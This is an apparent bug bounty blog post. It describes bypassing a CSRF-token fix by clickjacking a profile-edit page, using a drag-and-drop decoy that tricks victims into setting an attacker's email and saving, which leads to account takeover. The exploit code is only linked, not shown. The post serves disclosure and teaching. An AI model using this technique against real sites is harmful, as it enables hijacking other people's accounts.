Its considered low finding tbh but if you find a url which has some critical actions like deleting or adding an user, or changing users email then some companies might consider it as a medium/high finding like Google.
Clickjackings in Google worth 14981.7$
Instead of going for Cross Site Scripting, Remote Code Execution, SQL Injection, etc. I decided to find clickjacking in…
So i was looking for bugs on a website and reported a CSRF issue which led to account takeover. After a few weeks they fixed it by adding a CSRF Token/Key on the request like so.
Tried bypassing it with various ways but had no luck, until i discovered that the page is vulnerable to clickjacking. I use a website which helps me know if a url can be clickjacked or not.
Since the url is vulnerable to clickjacking it bypasses all CSRF protection. This page lets me change the name and email of the user which looked like this.
To exploit this i created a page in which the user has to drag something to a box and then a click a button. But what was really happening at the back was that the user was dragging text and putting it in the Email box and then clicking Save Changes which led to account takeover.
The code of the HTML can be found here https://pastebin.com/av71Mmf9 You can position the finish button and the red blob as your requirement and also change the text in the “DRAG ME TO THE RED BOX” text.
I thought this was enough for POC and the impact was also high, so i sent the report and it got accepted. They fixed and rewarded me pretty quickly.
Hope you learned something.